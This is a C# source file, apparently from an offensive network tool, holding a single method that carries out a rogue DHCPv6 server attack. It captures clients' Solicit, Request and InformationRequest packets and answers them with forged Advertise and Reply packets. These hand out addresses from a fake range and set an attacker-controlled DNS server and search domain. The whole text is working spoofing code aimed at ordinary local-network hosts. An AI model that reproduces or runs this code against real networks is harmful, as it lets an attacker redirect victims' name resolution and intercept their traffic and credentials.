unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
{
return;
}
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
{
return;
}
if (!(udp.ParentPacket is IPv6Packet))
{
return;
}
if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0)
{
return;
}
DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First();
IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket;
EthernetPacket ethernet = (EthernetPacket)p;
/*
* Info: http://en.wikipedia.org/wiki/DHCPv6
* Example
* In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64.
* DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547.
* DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
* DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.)
* DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
*/
DHCPv6Packet pa = new DHCPv6Packet();
pa.ParsePacket(udp.PayloadData);
if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2")))
{
EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress,
ethernet.SourceHwAddress,
EthernetPacketType.IpV6);
UdpPacket newUDP = null;
IPAddress ipv6LocalLink = null;
IPv6Packet newIpv6 = null;
switch (pa.MessageType)
{
case DHCPv6Type.Solicit:
if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA))
{
newUDP = new UdpPacket(547, 546);
byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value;
pa.MessageType = DHCPv6Type.Advertise;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
IpID++;
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
}
break;
case DHCPv6Type.Request:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.DNS);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
case DHCPv6Type.InformationRequest:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
default:
break;
}
}
}